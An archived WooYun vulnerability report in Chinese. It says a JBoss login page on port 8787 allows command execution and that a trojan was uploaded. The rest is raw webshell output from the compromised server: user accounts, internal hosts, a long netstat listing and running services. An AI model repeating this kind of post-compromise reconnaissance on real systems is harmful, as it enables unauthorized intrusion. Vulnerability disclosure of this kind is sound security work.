乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-17: 细节已通知厂商并且等待厂商处理中 2015-12-21: 厂商已经确认,细节仅向厂商公开 2015-12-31: 细节向核心白帽子及相关领域专家公开 2016-01-10: 细节向普通白帽子公开 2016-01-20: 细节向实习白帽子公开 2016-02-01: 细节向公众公开
RT
打开官网地址**.**.**.**
图中标识链接地址**.**.**.**:8787/login/存在命令执行漏洞
直接上传木马到服务器
[*] 磁盘列表 [ C:D:E: ]D:\webserver1\jboss404\server\default\.\deploy\webgis.war\webgis\> net user\\WINDOWS-4H2Q2BT 的用户帐户-------------------------------------------------------------------------------Administrator administratorsss Administratos ArcGISSOC ArcGISSOM ArcGiSSOMS ArcGISWebServices canye debug Guest test 命令成功完成。系统找不到指定的路径。D:\webserver1\jboss404\bin\> net view服务器名称 注解-------------------------------------------------------------------------------\\SERVERA \\SERVERB \\VX00005 Nas \\WINDOWS-4H2Q2BT \\WINDOWS-MG1OQ15 \\WINDOWS-SR5NC28 命令成功完成。D:\webserver1\jboss404\bin\> netstat -ano活动连接 协议 本地地址 外部地址 状态 PID TCP **.**.**.**:80 **.**.**.**:0 LISTENING 4 TCP **.**.**.**:135 **.**.**.**:0 LISTENING 848 TCP **.**.**.**:445 **.**.**.**:0 LISTENING 4 TCP **.**.**.**:1098 **.**.**.**:0 LISTENING 5816 TCP **.**.**.**:1099 **.**.**.**:0 LISTENING 5816 TCP **.**.**.**:1158 **.**.**.**:0 LISTENING 5000 TCP **.**.**.**:3389 **.**.**.**:0 LISTENING 4796 TCP **.**.**.**:3938 **.**.**.**:0 LISTENING 4188 TCP **.**.**.**:4444 **.**.**.**:0 LISTENING 5816 TCP **.**.**.**:4445 **.**.**.**:0 LISTENING 5816 TCP **.**.**.**:5520 **.**.**.**:0 LISTENING 5000 TCP **.**.**.**:8009 **.**.**.**:0 LISTENING 5816 TCP **.**.**.**:8787 **.**.**.**:0 LISTENING 5816 TCP **.**.**.**:9083 **.**.**.**:0 LISTENING 5816 TCP **.**.**.**:27000 **.**.**.**:0 LISTENING 1948 TCP **.**.**.**:49152 **.**.**.**:0 LISTENING 560 TCP **.**.**.**:49153 **.**.**.**:0 LISTENING 944 TCP **.**.**.**:49154 **.**.**.**:0 LISTENING 988 TCP **.**.**.**:49155 **.**.**.**:0 LISTENING 668 TCP **.**.**.**:49159 **.**.**.**:0 LISTENING 2004 TCP **.**.**.**:49299 **.**.**.**:0 LISTENING 660 TCP **.**.**.**:49300 **.**.**.**:0 LISTENING 968 TCP **.**.**.**:80 **.**.**.**:49003 SYN_RECEIVED 4 TCP **.**.**.**:80 **.**.**.**:52822 SYN_RECEIVED 4 TCP **.**.**.**:80 **.**.**.**:57797 SYN_RECEIVED 4 TCP **.**.**.**:80 **.**.**.**:58010 SYN_RECEIVED 4 TCP **.**.**.**:80 **.**.**.**:59614 SYN_RECEIVED 4 TCP **.**.**.**:80 **.**.**.**:59856 SYN_RECEIVED 4 TCP **.**.**.**:139 **.**.**.**:0 LISTENING 4 TCP **.**.**.**:8787 **.**.**.**:11769 TIME_WAIT 0 TCP **.**.**.**:8787 **.**.**.**:16405 TIME_WAIT 0 TCP **.**.**.**:8787 **.**.**.**:16440 ESTABLISHED 5816 TCP **.**.**.**:8787 **.**.**.**:58363 FIN_WAIT_2 5816 TCP **.**.**.**:8787 **.**.**.**:58364 FIN_WAIT_2 5816 TCP **.**.**.**:8787 **.**.**.**:58365 FIN_WAIT_2 5816 TCP **.**.**.**:8787 **.**.**.**:58370 FIN_WAIT_2 5816 TCP **.**.**.**:8787 **.**.**.**:50453 TIME_WAIT 0 TCP **.**.**.**:8787 **.**.**.**:59324 FIN_WAIT_2 5816 TCP **.**.**.**:8787 **.**.**.**:60391 TIME_WAIT 0 TCP **.**.**.**:8787 **.**.**.**:63253 TIME_WAIT 0 TCP **.**.**.**:8787 **.**.**.**:65475 TIME_WAIT 0 TCP **.**.**.**:8787 **.**.**.**:65513 TIME_WAIT 0 TCP **.**.**.**:49507 **.**.**.**:1521 ESTABLISHED 5816 TCP **.**.**.**:49519 **.**.**.**:1521 ESTABLISHED 5816 TCP **.**.**.**:49605 **.**.**.**:1521 ESTABLISHED 5816 TCP **.**.**.**:49615 **.**.**.**:1521 ESTABLISHED 5816 TCP **.**.**.**:50870 **.**.**.**:1521 ESTABLISHED 5816 TCP **.**.**.**:50983 **.**.**.**:1521 ESTABLISHED 5816 TCP **.**.**.**:51056 **.**.**.**:1521 ESTABLISHED 5816 TCP **.**.**.**:51082 **.**.**.**:1521 ESTABLISHED 5816 TCP **.**.**.**:51260 **.**.**.**:1521 ESTABLISHED 5816 TCP **.**.**.**:51264 **.**.**.**:80 CLOSE_WAIT 28400 TCP **.**.**.**:51265 **.**.**.**:80 CLOSE_WAIT 28400 TCP **.**.**.**:51268 **.**.**.**:80 CLOSE_WAIT 28400 TCP **.**.**.**:51270 **.**.**.**:80 CLOSE_WAIT 28400 TCP **.**.**.**:51280 **.**.**.**:1521 ESTABLISHED 5816 TCP **.**.**.**:51752 **.**.**.**:1521 ESTABLISHED 5816 TCP **.**.**.**:51829 **.**.**.**:1521 ESTABLISHED 5816 TCP **.**.**.**:51884 **.**.**.**:1521 ESTABLISHED 5816 TCP **.**.**.**:51989 **.**.**.**:1521 ESTABLISHED 5816 TCP **.**.**.**:52282 **.**.**.**:1521 ESTABLISHED 5816 TCP **.**.**.**:52338 **.**.**.**:1521 ESTABLISHED 5816 TCP **.**.**.**:52959 **.**.**.**:1521 ESTABLISHED 5816 TCP **.**.**.**:52962 **.**.**.**:1521 ESTABLISHED 5816 TCP **.**.**.**:53740 **.**.**.**:1521 ESTABLISHED 5816 TCP **.**.**.**:53743 **.**.**.**:1521 ESTABLISHED 5816 TCP **.**.**.**:53819 **.**.**.**:1521 ESTABLISHED 5816 TCP **.**.**.**:53820 **.**.**.**:1521 ESTABLISHED 5816 TCP **.**.**.**:53821 **.**.**.**:1521 ESTABLISHED 5816 TCP **.**.**.**:54236 **.**.**.**:1521 ESTABLISHED 5816 TCP **.**.**.**:54346 **.**.**.**:1521 ESTABLISHED 5816 TCP **.**.**.**:54444 **.**.**.**:1521 ESTABLISHED 5816 TCP **.**.**.**:54486 **.**.**.**:1521 ESTABLISHED 5816 TCP **.**.**.**:54567 **.**.**.**:1521 ESTABLISHED 5816 TCP **.**.**.**:54644 **.**.**.**:1521 ESTABLISHED 5816 TCP **.**.**.**:54648 **.**.**.**:1521 ESTABLISHED 5816 TCP **.**.**.**:54770 **.**.**.**:1521 ESTABLISHED 5816 TCP **.**.**.**:54902 **.**.**.**:1521 ESTABLISHED 5816 TCP **.**.**.**:55045 **.**.**.**:1521 ESTABLISHED 5816 TCP **.**.**.**:55379 **.**.**.**:1521 ESTABLISHED 5816 TCP **.**.**.**:55582 **.**.**.**:1521 ESTABLISHED 5816 TCP **.**.**.**:56410 **.**.**.**:1521 ESTABLISHED 5816 TCP **.**.**.**:56465 **.**.**.**:1521 ESTABLISHED 5816 TCP **.**.**.**:56590 **.**.**.**:1521 ESTABLISHED 5816 TCP **.**.**.**:58942 **.**.**.**:1521 ESTABLISHED 5816 TCP **.**.**.**:58943 **.**.**.**:1521 ESTABLISHED 5816 TCP **.**.**.**:58945 **.**.**.**:1521 ESTABLISHED 5816 TCP **.**.**.**:58946 **.**.**.**:1521 ESTABLISHED 5816 TCP **.**.**.**:58947 **.**.**.**:1521 ESTABLISHED 5816 TCP **.**.**.**:58949 **.**.**.**:1521 ESTABLISHED 5816 TCP **.**.**.**:58950 **.**.**.**:1521 ESTABLISHED 5816 TCP **.**.**.**:58951 **.**.**.**:1521 ESTABLISHED 5816 TCP **.**.**.**:58952 **.**.**.**:1521 ESTABLISHED 5816 TCP **.**.**.**:58953 **.**.**.**:1521 ESTABLISHED 5816 TCP **.**.**.**:58954 **.**.**.**:1521 ESTABLISHED 5816 TCP **.**.**.**:58955 **.**.**.**:1521 ESTABLISHED 5816 TCP **.**.**.**:58956 **.**.**.**:1521 ESTABLISHED 5816 TCP **.**.**.**:58957 **.**.**.**:1521 ESTABLISHED 5816 TCP **.**.**.**:58958 **.**.**.**:1521 ESTABLISHED 5816 TCP **.**.**.**:58959 **.**.**.**:1521 ESTABLISHED 5816 TCP **.**.**.**:58960 **.**.**.**:1521 ESTABLISHED 5816 TCP **.**.**.**:60102 **.**.**.**:8888 CLOSE_WAIT 1448 TCP **.**.**.**:60807 **.**.**.**:1521 ESTABLISHED 5816 TCP **.**.**.**:61525 **.**.**.**:1521 ESTABLISHED 5816 TCP **.**.**.**:62037 **.**.**.**:443 TIME_WAIT 0 TCP **.**.**.**:62191 **.**.**.**:8888 CLOSE_WAIT 3244 TCP **.**.**.**:62453 **.**.**.**:1521 ESTABLISHED 5816 TCP **.**.**.**:62454 **.**.**.**:1521 ESTABLISHED 5816 TCP **.**.**.**:62546 **.**.**.**:1521 ESTABLISHED 5816 TCP **.**.**.**:62900 **.**.**.**:8888 TIME_WAIT 0 TCP **.**.**.**:62903 **.**.**.**:443 TIME_WAIT 0 TCP **.**.**.**:62909 **.**.**.**:443 TIME_WAIT 0 TCP **.**.**.**:62920 **.**.**.**:443 TIME_WAIT 0 TCP **.**.**.**:62921 **.**.**.**:443 TIME_WAIT 0 TCP **.**.**.**:62927 **.**.**.**:443 TIME_WAIT 0 TCP **.**.**.**:62939 **.**.**.**:443 TIME_WAIT 0 TCP **.**.**.**:62945 **.**.**.**:8888 TIME_WAIT 0 TCP **.**.**.**:62970 **.**.**.**:8888 TIME_WAIT 0 TCP **.**.**.**:62975 **.**.**.**:443 TIME_WAIT 0 TCP **.**.**.**:62981 **.**.**.**:443 TIME_WAIT 0 TCP **.**.**.**:62982 **.**.**.**:80 TIME_WAIT 0 TCP **.**.**.**:62991 **.**.**.**:443 TIME_WAIT 0 TCP **.**.**.**:62992 **.**.**.**:443 TIME_WAIT 0 TCP **.**.**.**:62996 **.**.**.**:443 TIME_WAIT 0 TCP **.**.**.**:62997 **.**.**.**:443 TIME_WAIT 0 TCP **.**.**.**:63007 **.**.**.**:443 TIME_WAIT 0 TCP **.**.**.**:63013 **.**.**.**:443 TIME_WAIT 0 TCP **.**.**.**:63019 **.**.**.**:8888 TIME_WAIT 0 TCP **.**.**.**:63022 **.**.**.**:443 TIME_WAIT 0 TCP **.**.**.**:63023 **.**.**.**:443 TIME_WAIT 0 TCP **.**.**.**:63040 **.**.**.**:8888 TIME_WAIT 0 TCP **.**.**.**:63041 **.**.**.**:80 ESTABLISHED 1304644 TCP **.**.**.**:63047 **.**.**.**:8888 TIME_WAIT 0 TCP **.**.**.**:63051 **.**.**.**:443 TIME_WAIT 0 TCP **.**.**.**:63052 **.**.**.**:443 TIME_WAIT 0 TCP **.**.**.**:63053 **.**.**.**:443 TIME_WAIT 0 TCP **.**.**.**:63057 **.**.**.**:443 TIME_WAIT 0 TCP **.**.**.**:63058 **.**.**.**:443 TIME_WAIT 0 TCP **.**.**.**:63063 **.**.**.**:443 TIME_WAIT 0 TCP **.**.**.**:63064 **.**.**.**:443 TIME_WAIT 0 TCP **.**.**.**:63067 **.**.**.**:443 TIME_WAIT 0 TCP **.**.**.**:63088 **.**.**.**:443 ESTABLISHED 956368 TCP **.**.**.**:63089 **.**.**.**:443 TIME_WAIT 0 TCP **.**.**.**:63090 **.**.**.**:443 TIME_WAIT 0 TCP **.**.**.**:63094 **.**.**.**:443 ESTABLISHED 956368 TCP **.**.**.**:63095 **.**.**.**:443 TIME_WAIT 0 TCP **.**.**.**:63096 **.**.**.**:443 ESTABLISHED 956368 TCP **.**.**.**:63097 **.**.**.**:443 ESTABLISHED 956368 TCP **.**.**.**:63098 **.**.**.**:443 TIME_WAIT 0 TCP **.**.**.**:63099 **.**.**.**:443 TIME_WAIT 0 TCP **.**.**.**:63100 **.**.**.**:443 ESTABLISHED 956368 TCP **.**.**.**:63101 **.**.**.**:443 ESTABLISHED 956368 TCP **.**.**.**:63103 **.**.**.**:443 ESTABLISHED 956368 TCP **.**.**.**:63105 **.**.**.**:443 TIME_WAIT 0 TCP **.**.**.**:63106 **.**.**.**:443 TIME_WAIT 0 TCP **.**.**.**:63107 **.**.**.**:443 TIME_WAIT 0 TCP **.**.**.**:63108 **.**.**.**:443 ESTABLISHED 956368 TCP **.**.**.**:63109 **.**.**.**:443 ESTABLISHED 956368 TCP **.**.**.**:63110 **.**.**.**:443 ESTABLISHED 956368 TCP **.**.**.**:63111 **.**.**.**:443 ESTABLISHED 956368 TCP **.**.**.**:63124 **.**.**.**:80 ESTABLISHED 2304 TCP **.**.**.**:63127 **.**.**.**:443 ESTABLISHED 956368 TCP **.**.**.**:63135 **.**.**.**:8888 TIME_WAIT 0 TCP **.**.**.**:63136 **.**.**.**:443 ESTABLISHED 956368 TCP **.**.**.**:63138 **.**.**.**:443 ESTABLISHED 956368 TCP **.**.**.**:63139 **.**.**.**:443 ESTABLISHED 956368 TCP **.**.**.**:63145 **.**.**.**:443 TIME_WAIT 0 TCP **.**.**.**:63146 **.**.**.**:443 TIME_WAIT 0 TCP **.**.**.**:63152 **.**.**.**:443 ESTABLISHED 956368 TCP **.**.**.**:63153 **.**.**.**:443 ESTABLISHED 956368 TCP **.**.**.**:63157 **.**.**.**:443 ESTABLISHED 954664 TCP **.**.**.**:63158 **.**.**.**:443 ESTABLISHED 953616 TCP **.**.**.**:63161 **.**.**.**:443 ESTABLISHED 953616 TCP **.**.**.**:63165 **.**.**.**:443 ESTABLISHED 953616 TCP **.**.**.**:63166 **.**.**.**:443 ESTABLISHED 953616 TCP **.**.**.**:63167 **.**.**.**:443 ESTABLISHED 954664 TCP **.**.**.**:63168 **.**.**.**:443 ESTABLISHED 954664 TCP **.**.**.**:63171 **.**.**.**:443 ESTABLISHED 953616 TCP **.**.**.**:63172 **.**.**.**:443 ESTABLISHED 953616 TCP **.**.**.**:63173 **.**.**.**:443 ESTABLISHED 953616 TCP **.**.**.**:63176 **.**.**.**:443 ESTABLISHED 953616 TCP **.**.**.**:63177 **.**.**.**:443 TIME_WAIT 0 TCP **.**.**.**:63178 **.**.**.**:443 ESTABLISHED 954664 TCP **.**.**.**:63179 **.**.**.**:443 TIME_WAIT 0 TCP **.**.**.**:63180 **.**.**.**:443 TIME_WAIT 0 TCP **.**.**.**:63181 **.**.**.**:443 ESTABLISHED 953616 TCP **.**.**.**:63182 **.**.**.**:443 TIME_WAIT 0 TCP **.**.**.**:63183 **.**.**.**:443 TIME_WAIT 0 TCP **.**.**.**:63184 **.**.**.**:443 TIME_WAIT 0 TCP **.**.**.**:63186 **.**.**.**:443 ESTABLISHED 954664 TCP **.**.**.**:63187 **.**.**.**:443 TIME_WAIT 0 TCP **.**.**.**:63188 **.**.**.**:443 ESTABLISHED 953616 TCP **.**.**.**:63189 **.**.**.**:443 ESTABLISHED 953616 TCP **.**.**.**:63190 **.**.**.**:443 ESTABLISHED 954664 TCP **.**.**.**:63191 **.**.**.**:443 ESTABLISHED 953616 TCP **.**.**.**:63192 **.**.**.**:443 ESTABLISHED 954664 TCP **.**.**.**:63193 **.**.**.**:443 TIME_WAIT 0 TCP **.**.**.**:63194 **.**.**.**:443 TIME_WAIT 0 TCP **.**.**.**:63195 **.**.**.**:443 TIME_WAIT 0 TCP **.**.**.**:63196 **.**.**.**:443 ESTABLISHED 954664 TCP **.**.**.**:63197 **.**.**.**:443 ESTABLISHED 954664 TCP **.**.**.**:63198 **.**.**.**:443 ESTABLISHED 953616 TCP **.**.**.**:63199 **.**.**.**:443 TIME_WAIT 0 TCP **.**.**.**:63200 **.**.**.**:443 ESTABLISHED 954664 TCP **.**.**.**:63201 **.**.**.**:443 ESTABLISHED 953616 TCP **.**.**.**:63203 **.**.**.**:443 ESTABLISHED 954664 TCP **.**.**.**:63205 **.**.**.**:443 TIME_WAIT 0 TCP **.**.**.**:63206 **.**.**.**:443 ESTABLISHED 954664 TCP **.**.**.**:63207 **.**.**.**:443 ESTABLISHED 953616 TCP **.**.**.**:63208 **.**.**.**:443 TIME_WAIT 0 TCP **.**.**.**:63209 **.**.**.**:443 ESTABLISHED 954664 TCP **.**.**.**:63210 **.**.**.**:443 ESTABLISHED 954664 TCP **.**.**.**:63211 **.**.**.**:443 TIME_WAIT 0 TCP **.**.**.**:63212 **.**.**.**:443 ESTABLISHED 954664 TCP **.**.**.**:63213 **.**.**.**:443 ESTABLISHED 953616 TCP **.**.**.**:63214 **.**.**.**:443 ESTABLISHED 953616 TCP **.**.**.**:63215 **.**.**.**:443 ESTABLISHED 953616 TCP **.**.**.**:63216 **.**.**.**:443 ESTABLISHED 954664 TCP **.**.**.**:63219 **.**.**.**:443 ESTABLISHED 954664 TCP **.**.**.**:63223 **.**.**.**:443 ESTABLISHED 953616 TCP **.**.**.**:63226 **.**.**.**:443 ESTABLISHED 954664 TCP **.**.**.**:63227 **.**.**.**:443 ESTABLISHED 953616 TCP **.**.**.**:63229 **.**.**.**:443 ESTABLISHED 953616 TCP **.**.**.**:63233 **.**.**.**:443 ESTABLISHED 953616 TCP **.**.**.**:63234 **.**.**.**:443 ESTABLISHED 953616 TCP **.**.**.**:63235 **.**.**.**:443 ESTABLISHED 954664 TCP **.**.**.**:63237 **.**.**.**:443 ESTABLISHED 953616 TCP **.**.**.**:63238 **.**.**.**:443 ESTABLISHED 954664 TCP **.**.**.**:63239 **.**.**.**:443 ESTABLISHED 953616 TCP **.**.**.**:63240 **.**.**.**:443 ESTABLISHED 953616 TCP **.**.**.**:63241 **.**.**.**:443 ESTABLISHED 954664 TCP **.**.**.**:63243 **.**.**.**:443 ESTABLISHED 953616 TCP **.**.**.**:63244 **.**.**.**:443 ESTABLISHED 954664 TCP **.**.**.**:63245 **.**.**.**:443 ESTABLISHED 954664 TCP **.**.**.**:63246 **.**.**.**:443 CLOSE_WAIT 953616 TCP **.**.**.**:63247 **.**.**.**:443 ESTABLISHED 954664 TCP **.**.**.**:63248 **.**.**.**:443 ESTABLISHED 954664 TCP **.**.**.**:63249 **.**.**.**:443 ESTABLISHED 954664 TCP **.**.**.**:63252 **.**.**.**:443 ESTABLISHED 953616 TCP **.**.**.**:63253 **.**.**.**:443 ESTABLISHED 953616 TCP **.**.**.**:63255 **.**.**.**:443 TIME_WAIT 0 TCP **.**.**.**:63256 **.**.**.**:443 ESTABLISHED 954664 TCP **.**.**.**:63257 **.**.**.**:443 ESTABLISHED 954664 TCP **.**.**.**:63259 **.**.**.**:443 ESTABLISHED 954664 TCP **.**.**.**:63260 **.**.**.**:80 ESTABLISHED 1320 TCP **.**.**.**:63261 **.**.**.**:8888 TIME_WAIT 0 TCP **.**.**.**:63262 **.**.**.**:443 ESTABLISHED 939068 TCP **.**.**.**:63266 **.**.**.**:443 ESTABLISHED 954664 TCP **.**.**.**:63267 **.**.**.**:443 TIME_WAIT 0 TCP **.**.**.**:63268 **.**.**.**:443 TIME_WAIT 0 TCP **.**.**.**:63270 **.**.**.**:443 TIME_WAIT 0 TCP **.**.**.**:63271 **.**.**.**:443 ESTABLISHED 939068 TCP **.**.**.**:63272 **.**.**.**:443 ESTABLISHED 939068 TCP **.**.**.**:63273 **.**.**.**:443 ESTABLISHED 939068 TCP **.**.**.**:63274 **.**.**.**:443 TIME_WAIT 0 TCP **.**.**.**:63275 **.**.**.**:443 TIME_WAIT 0 TCP **.**.**.**:63276 **.**.**.**:443 ESTABLISHED 939068 TCP **.**.**.**:63277 **.**.**.**:443 ESTABLISHED 939068 TCP **.**.**.**:63279 **.**.**.**:443 ESTABLISHED 939068 TCP **.**.**.**:63280 **.**.**.**:443 TIME_WAIT 0 TCP **.**.**.**:63281 **.**.**.**:443 TIME_WAIT 0 TCP **.**.**.**:63283 **.**.**.**:443 ESTABLISHED 939068 TCP **.**.**.**:63284 **.**.**.**:443 ESTABLISHED 939068 TCP **.**.**.**:63285 **.**.**.**:443 TIME_WAIT 0 TCP **.**.**.**:63286 **.**.**.**:443 ESTABLISHED 939068 TCP **.**.**.**:63287 **.**.**.**:443 ESTABLISHED 939068 TCP **.**.**.**:63290 **.**.**.**:443 ESTABLISHED 954664 TCP **.**.**.**:63291 **.**.**.**:443 ESTABLISHED 939068 TCP **.**.**.**:63292 **.**.**.**:443 ESTABLISHED 939068 TCP **.**.**.**:63294 **.**.**.**:443 ESTABLISHED 939068 TCP **.**.**.**:63295 **.**.**.**:443 ESTABLISHED 939068 TCP **.**.**.**:63298 **.**.**.**:443 ESTABLISHED 939068 TCP **.**.**.**:63299 **.**.**.**:443 ESTABLISHED 939068 TCP **.**.**.**:63301 **.**.**.**:443 ESTABLISHED 954664 TCP **.**.**.**:63302 **.**.**.**:443 ESTABLISHED 954664 TCP **.**.**.**:63309 **.**.**.**:443 ESTABLISHED 939068 TCP **.**.**.**:63311 **.**.**.**:443 ESTABLISHED 939068 TCP **.**.**.**:63312 **.**.**.**:443 ESTABLISHED 954664 TCP **.**.**.**:63313 **.**.**.**:443 ESTABLISHED 955756 TCP **.**.**.**:63314 **.**.**.**:443 TIME_WAIT 0 TCP **.**.**.**:63315 **.**.**.**:443 TIME_WAIT 0 TCP **.**.**.**:63316 **.**.**.**:443 ESTABLISHED 955756 TCP **.**.**.**:63317 **.**.**.**:443 TIME_WAIT 0 TCP **.**.**.**:63318 **.**.**.**:443 ESTABLISHED 955756 TCP **.**.**.**:63319 **.**.**.**:443 ESTABLISHED 955756 TCP **.**.**.**:63320 **.**.**.**:443 TIME_WAIT 0 TCP **.**.**.**:63321 **.**.**.**:443 TIME_WAIT 0 TCP **.**.**.**:63322 **.**.**.**:443 ESTABLISHED 955756 TCP **.**.**.**:63323 **.**.**.**:443 ESTABLISHED 955756 TCP **.**.**.**:63325 **.**.**.**:443 ESTABLISHED 955756 TCP **.**.**.**:63326 **.**.**.**:443 TIME_WAIT 0 TCP **.**.**.**:63327 **.**.**.**:443 TIME_WAIT 0 TCP **.**.**.**:63328 **.**.**.**:443 TIME_WAIT 0 TCP **.**.**.**:63330 **.**.**.**:443 ESTABLISHED 955756 TCP **.**.**.**:63331 **.**.**.**:443 ESTABLISHED 955756 TCP **.**.**.**:63332 **.**.**.**:443 ESTABLISHED 955756 TCP **.**.**.**:63333 **.**.**.**:443 ESTABLISHED 955756 TCP **.**.**.**:63337 **.**.**.**:8888 TIME_WAIT 0 TCP **.**.**.**:63339 **.**.**.**:443 ESTABLISHED 955756 TCP **.**.**.**:63340 **.**.**.**:443 ESTABLISHED 955756 TCP **.**.**.**:63341 **.**.**.**:443 ESTABLISHED 955756 TCP **.**.**.**:63342 **.**.**.**:443 ESTABLISHED 954664 TCP **.**.**.**:63343 **.**.**.**:443 ESTABLISHED 955756 TCP **.**.**.**:63345 **.**.**.**:443 ESTABLISHED 955756 TCP **.**.**.**:63353 **.**.**.**:443 ESTABLISHED 955756 TCP **.**.**.**:63355 **.**.**.**:443 ESTABLISHED 955756 TCP **.**.**.**:63356 **.**.**.**:443 ESTABLISHED 955756 TCP **.**.**.**:63358 **.**.**.**:443 ESTABLISHED 954664 TCP **.**.**.**:63359 **.**.**.**:443 TIME_WAIT 0 TCP **.**.**.**:63366 **.**.**.**:8888 TIME_WAIT 0 TCP **.**.**.**:63377 **.**.**.**:443 ESTABLISHED 954664 TCP **.**.**.**:63380 **.**.**.**:443 ESTABLISHED 954664 TCP **.**.**.**:63386 **.**.**.**:443 ESTABLISHED 956368 TCP **.**.**.**:63388 **.**.**.**:443 ESTABLISHED 956368 TCP **.**.**.**:63390 **.**.**.**:443 ESTABLISHED 956368 TCP **.**.**.**:63392 **.**.**.**:443 TIME_WAIT 0 TCP **.**.**.**:63393 **.**.**.**:443 TIME_WAIT 0 TCP **.**.**.**:63394 **.**.**.**:443 ESTABLISHED 956368 TCP **.**.**.**:63395 **.**.**.**:443 ESTABLISHED 956368 TCP **.**.**.**:63399 **.**.**.**:443 ESTABLISHED 956368 TCP **.**.**.**:63402 **.**.**.**:8888 TIME_WAIT 0 TCP **.**.**.**:63403 **.**.**.**:443 ESTABLISHED 956368 TCP **.**.**.**:63404 **.**.**.**:139 ESTABLISHED 4 TCP **.**.**.**:63405 **.**.**.**:443 ESTABLISHED 954664 TCP **.**.**.**:63406 **.**.**.**:443 ESTABLISHED 954664 TCP **.**.**.**:63408 **.**.**.**:443 ESTABLISHED 946888 TCP **.**.**.**:63412 **.**.**.**:443 ESTABLISHED 946888 TCP **.**.**.**:63414 **.**.**.**:9904 SYN_SENT 1508 TCP **.**.**.**:63417 **.**.**.**:443 ESTABLISHED 953616 TCP **.**.**.**:63421 **.**.**.**:443 ESTABLISHED 953616 TCP **.**.**.**:63422 **.**.**.**:443 ESTABLISHED 953616 TCP **.**.**.**:63423 **.**.**.**:443 ESTABLISHED 953616 TCP **.**.**.**:63426 **.**.**.**:443 ESTABLISHED 953616 TCP **.**.**.**:63429 **.**.**.**:443 ESTABLISHED 953616 TCP **.**.**.**:63430 **.**.**.**:443 ESTABLISHED 953616 TCP **.**.**.**:63431 **.**.**.**:8888 TIME_WAIT 0 TCP **.**.**.**:63862 **.**.**.**:1521 ESTABLISHED 5816 TCP **.**.**.**:64122 **.**.**.**:1521 ESTABLISHED 5816 TCP **.**.**.**:64794 **.**.**.**:1521 ESTABLISHED 5816 TCP **.**.**.**:65289 **.**.**.**:1521 ESTABLISHED 5816 TCP **.**.**.**:65319 **.**.**.**:1521 ESTABLISHED 5816 TCP **.**.**.**:8787 **.**.**.**:63042 TIME_WAIT 0 TCP **.**.**.**:8787 **.**.**.**:63092 TIME_WAIT 0 TCP **.**.**.**:8787 **.**.**.**:63236 TIME_WAIT 0 TCP **.**.**.**:8787 **.**.**.**:63303 TIME_WAIT 0 TCP **.**.**.**:10000 **.**.**.**:0 LISTENING 4188 TCP **.**.**.**:27000 **.**.**.**:49163 ESTABLISHED 1948 TCP **.**.**.**:49157 **.**.**.**:49158 ESTABLISHED 1508 TCP **.**.**.**:49158 **.**.**.**:49157 ESTABLISHED 1508 TCP **.**.**.**:49161 **.**.**.**:49162 ESTABLISHED 2004 TCP **.**.**.**:49162 **.**.**.**:49161 ESTABLISHED 2004 TCP **.**.**.**:49163 **.**.**.**:27000 ESTABLISHED 2004 TCP **.**.**.**:49217 **.**.**.**:49218 ESTABLISHED 5000 TCP **.**.**.**:49218 **.**.**.**:49217 ESTABLISHED 5000 TCP **.**.**.**:139 **.**.**.**:0 LISTENING 4 TCP **.**.**.**:3873 **.**.**.**:0 LISTENING 5816 TCP [::]:80 [::]:0 LISTENING 4 TCP [::]:135 [::]:0 LISTENING 848 TCP [::]:445 [::]:0 LISTENING 4 TCP [::]:1098 [::]:0 LISTENING 5816 TCP [::]:1099 [::]:0 LISTENING 5816 TCP [::]:3389 [::]:0 LISTENING 4796 TCP [::]:3938 [::]:0 LISTENING 4188 TCP [::]:4444 [::]:0 LISTENING 5816 TCP [::]:4445 [::]:0 LISTENING 5816 TCP [::]:5520 [::]:0 LISTENING 5000 TCP [::]:8009 [::]:0 LISTENING 5816 TCP [::]:8787 [::]:0 LISTENING 5816 TCP [::]:9083 [::]:0 LISTENING 5816 TCP [::]:49152 [::]:0 LISTENING 560 TCP [::]:49153 [::]:0 LISTENING 944 TCP [::]:49154 [::]:0 LISTENING 988 TCP [::]:49155 [::]:0 LISTENING 668 TCP [::]:49299 [::]:0 LISTENING 660 TCP [::]:49300 [::]:0 LISTENING 968 UDP **.**.**.**:68 *:* 944 UDP **.**.**.**:161 *:* 2232 UDP **.**.**.**:500 *:* 988 UDP **.**.**.**:3600 *:* 2304 UDP **.**.**.**:4500 *:* 988 UDP **.**.**.**:54296 *:* 8284 UDP **.**.**.**:55239 *:* 8284 UDP **.**.**.**:59189 *:* 8284 UDP **.**.**.**:60561 *:* 8284 UDP **.**.**.**:60562 *:* 8284 UDP **.**.**.**:60878 *:* 8284 UDP **.**.**.**:63507 *:* 2156 UDP **.**.**.**:63657 *:* 3244 UDP **.**.**.**:64372 *:* 2304 UDP **.**.**.**:137 *:* 4 UDP **.**.**.**:138 *:* 4 UDP **.**.**.**:49505 *:* 2304 UDP **.**.**.**:51404 *:* 50164 UDP **.**.**.**:53330 *:* 28400 UDP **.**.**.**:54777 *:* 946304 UDP **.**.**.**:56621 *:* 10296 UDP **.**.**.**:57903 *:* 953616 UDP **.**.**.**:58170 *:* 939068 UDP **.**.**.**:60615 *:* 954224 UDP **.**.**.**:61119 *:* 954664 UDP **.**.**.**:61471 *:* 955756 UDP **.**.**.**:61808 *:* 946888 UDP **.**.**.**:62266 *:* 956368 UDP **.**.**.**:63658 *:* 1320 UDP **.**.**.**:64354 *:* 1304644 UDP **.**.**.**:137 *:* 4 UDP **.**.**.**:138 *:* 4 UDP [::]:161 *:* 2232 UDP [::]:500 *:* 988 UDP [::]:4500 *:* 988D:\webserver1\jboss404\bin\> net start已经启动以下 Windows 服务: 360 杀毒实时防护加载服务 360EntClientService AnyBackupClientEngine Application Experience Application Host Helper Service ArcGIS License Manager ArcGIS Server Object Manager ArcGIS SOC Monitor Background Intelligent Transfer Service Base Filtering Engine Certificate Propagation COM+ Event System Cryptographic Services DbSecuritySpt DCOM Server Process Launcher Desktop Window Manager Session Manager DHCP Client Diagnostic Policy Service DNS Client Function Discovery Provider Host Group Policy Client Human Interface Device Access IIS Admin Service IKE and AuthIP IPsec Keying Modules IP Helper IPsec Policy Agent Microsoft FTP Service Network Connections Network List Service Network Location Awareness Network Store Interface Service OracleDBConsolesafe Plug and Play Power Print Spooler QPCore Service Remote Desktop Configuration Remote Desktop Services Remote Desktop Services UserMode Port Redirector Remote Procedure Call (RPC) RPC Endpoint Mapper Security Accounts Manager Server Shell Hardware Detection SNMP Service System Event Notification Service Task Scheduler TCP/IP 